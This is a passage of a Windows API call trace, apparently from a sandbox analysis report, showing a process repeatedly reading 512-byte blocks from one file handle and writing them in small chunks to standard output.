lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.182] GetFileType (hFile=0x50) returned 0x1 [0218.182] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.182] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.182] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.182] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.182] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.182] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.183] 
GetFileType (hFile=0x50) returned 0x1 [0218.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.183] GetFileType (hFile=0x50) returned 0x1 [0218.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.183] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.183] GetFileType (hFile=0x50) returned 0x1 [0218.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.183] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.183] GetFileType (hFile=0x50) returned 0x1 [0218.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.183] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.183] GetFileType (hFile=0x50) returned 0x1 [0218.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.183] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.183] GetFileType (hFile=0x50) returned 0x1 [0218.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.183] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 
[0218.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.183] GetFileType (hFile=0x50) returned 0x1 [0218.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.183] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.183] GetFileType (hFile=0x50) returned 0x1 [0218.183] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.183] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.184] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.184] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.184] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.184] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.184] GetFileType (hFile=0x50) returned 0x1 [0218.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.184] GetFileType (hFile=0x50) returned 0x1 [0218.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.184] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.184] GetFileType (hFile=0x50) returned 0x1 [0218.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.184] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.184] GetFileType (hFile=0x50) returned 0x1 [0218.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.184] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.184] GetFileType (hFile=0x50) returned 0x1 [0218.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.184] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.184] GetFileType (hFile=0x50) returned 0x1 [0218.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.184] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.184] GetFileType (hFile=0x50) returned 0x1 [0218.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.184] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.184] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.184] GetFileType (hFile=0x50) returned 0x1 [0218.185] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.185] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.185] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.185] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.185] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.185] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.185] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.185] GetFileType (hFile=0x50) returned 0x1 [0218.185] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.185] GetFileType (hFile=0x50) returned 0x1 [0218.185] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.185] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.185] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.185] GetFileType (hFile=0x50) returned 0x1 [0218.185] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.185] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.185] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.185] GetFileType (hFile=0x50) returned 0x1 [0218.185] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.185] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.185] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.185] GetFileType 
(hFile=0x50) returned 0x1 [0218.185] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.185] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.185] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.185] GetFileType (hFile=0x50) returned 0x1 [0218.185] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.185] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.186] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.186] GetFileType (hFile=0x50) returned 0x1 [0218.186] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.186] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.186] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.186] GetFileType (hFile=0x50) returned 0x1 [0218.186] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.186] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.186] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.186] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.186] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.186] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.186] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0218.186] GetFileType (hFile=0x50) returned 0x1 [0218.186] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.186] GetFileType (hFile=0x50) returned 0x1 [0218.186] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.186] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.186] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.186] GetFileType (hFile=0x50) returned 0x1 [0218.186] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.186] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.186] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.186] GetFileType (hFile=0x50) returned 0x1 [0218.186] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.186] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.186] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.186] GetFileType (hFile=0x50) returned 0x1 [0218.186] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.186] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.186] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.187] GetFileType (hFile=0x50) returned 0x1 [0218.187] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.187] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, 
lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.187] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.187] GetFileType (hFile=0x50) returned 0x1 [0218.187] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.187] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.187] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.187] GetFileType (hFile=0x50) returned 0x1 [0218.187] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.187] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.187] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.187] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.187] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.187] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.187] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.187] GetFileType (hFile=0x50) returned 0x1 [0218.187] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.187] GetFileType (hFile=0x50) returned 0x1 [0218.187] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.187] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.187] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.187] GetFileType (hFile=0x50) returned 0x1 [0218.187] _get_osfhandle (_FileHandle=1) returned 0x50 
[0218.187] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.187] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.187] GetFileType (hFile=0x50) returned 0x1 [0218.187] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.187] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.187] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.187] GetFileType (hFile=0x50) returned 0x1 [0218.188] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.188] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.188] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.188] GetFileType (hFile=0x50) returned 0x1 [0218.188] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.188] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.188] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.188] GetFileType (hFile=0x50) returned 0x1 [0218.188] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.188] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.188] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.188] GetFileType (hFile=0x50) returned 0x1 [0218.188] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.188] WriteFile (in: hFile=0x50, 
lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.188] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.188] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.188] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.188] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.188] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.188] GetFileType (hFile=0x50) returned 0x1 [0218.188] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.188] GetFileType (hFile=0x50) returned 0x1 [0218.188] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.188] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.188] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.188] GetFileType (hFile=0x50) returned 0x1 [0218.188] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.188] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.188] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.188] GetFileType (hFile=0x50) returned 0x1 [0218.188] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.189] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.189] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0218.189] GetFileType (hFile=0x50) returned 0x1 [0218.189] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.189] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.189] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.189] GetFileType (hFile=0x50) returned 0x1 [0218.189] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.189] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.189] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.189] GetFileType (hFile=0x50) returned 0x1 [0218.189] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.189] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.189] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.189] GetFileType (hFile=0x50) returned 0x1 [0218.189] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.189] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.189] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.189] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.189] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.189] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, 
lpOverlapped=0x0) returned 1 [0218.189] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.189] GetFileType (hFile=0x50) returned 0x1 [0218.189] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.189] GetFileType (hFile=0x50) returned 0x1 [0218.189] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.189] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.189] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.189] GetFileType (hFile=0x50) returned 0x1 [0218.189] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.189] WriteFile (in: hFile=0x50, lpBuffer=0x16ef04*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef04*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.190] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.190] GetFileType (hFile=0x50) returned 0x1 [0218.190] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.190] WriteFile (in: hFile=0x50, lpBuffer=0x16ef54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16ef54*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.190] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.190] GetFileType (hFile=0x50) returned 0x1 [0218.190] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.190] WriteFile (in: hFile=0x50, lpBuffer=0x16efa4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16efa4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.190] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.190] GetFileType (hFile=0x50) returned 0x1 [0218.190] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.190] WriteFile (in: hFile=0x50, lpBuffer=0x16eff4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 
| out: lpBuffer=0x16eff4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.190] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.190] GetFileType (hFile=0x50) returned 0x1 [0218.190] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.190] WriteFile (in: hFile=0x50, lpBuffer=0x16f044*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f044*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.190] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.190] GetFileType (hFile=0x50) returned 0x1 [0218.190] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.190] WriteFile (in: hFile=0x50, lpBuffer=0x16f094*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16f094*, lpNumberOfBytesWritten=0x16e098*=0x20, lpOverlapped=0x0) returned 1 [0218.190] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.190] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e084 | out: lpNewFilePointer=0x0) returned 1 [0218.190] _get_osfhandle (_FileHandle=4) returned 0x58 [0218.190] ReadFile (in: hFile=0x58, lpBuffer=0x16eeb4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e0a4, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesRead=0x16e0a4*=0x200, lpOverlapped=0x0) returned 1 [0218.190] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.190] GetFileType (hFile=0x50) returned 0x1 [0218.190] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.190] GetFileType (hFile=0x50) returned 0x1 [0218.190] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.190] WriteFile (in: hFile=0x50, lpBuffer=0x16eeb4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e098, lpOverlapped=0x0 | out: lpBuffer=0x16eeb4*, lpNumberOfBytesWritten=0x16e098*=0x50, lpOverlapped=0x0) returned 1 [0218.267] _get_osfhandle (_FileHandle=1) returned 0x50 [0218.267] GetFileType 